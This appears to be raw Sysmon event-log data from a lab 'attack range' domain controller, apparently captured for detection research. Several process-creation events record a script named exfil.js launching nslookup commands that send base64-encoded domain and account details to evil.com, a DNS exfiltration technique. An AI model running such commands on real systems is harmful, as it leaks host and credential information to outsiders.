14:21:26.789{2E1864BB-18E6-629A-EC42-000000005F02}74162260C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-EB42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000207152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.228{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50500- 354300x8000000000000000207151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50499- 354300x8000000000000000207150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50498- 354300x8000000000000000207149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{00000000-0000-0000-0000-000000000000}5704<unknown process>-udptruefalse127.0.0.1-50498-false127.0.0.1-53domain 354300x8000000000000000207148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.159{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50497- 10341000x8000000000000000207147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-EC42-000000005F02}7416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-EB42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-18E0-629A-6742-000000005F02}39764100C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-EB42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.779{2E1864BB-18E6-629A-EB42-000000005F02}8128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmnai.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.773{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlixorpjg.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-18E6-629A-E942-000000005F02}20884596C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-EA42-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-EA42-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-18E6-629A-E842-000000005F02}5488928C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-EA42-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.746{2E1864BB-18E6-629A-EA42-000000005F02}7632C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-E842-000000005F02}5488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixorpjg.tmp 2>&1 23542300x8000000000000000207130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.735{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C73DAFE3484980C7ED997C04C8AFF2,SHA256=D5D5DE28BE610B003E41EA05627D743D75995A8076441F5AC4649E7C20E9FA2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.720{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E942-000000005F02}2088C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.720{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-E942-000000005F02}2088C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.720{2E1864BB-18E6-629A-E942-000000005F02}20884596C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-E842-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E942-000000005F02}2088C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-E842-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.704{2E1864BB-18E0-629A-6742-000000005F02}39764188C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-E842-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.712{2E1864BB-18E6-629A-E842-000000005F02}5488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixorpjg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 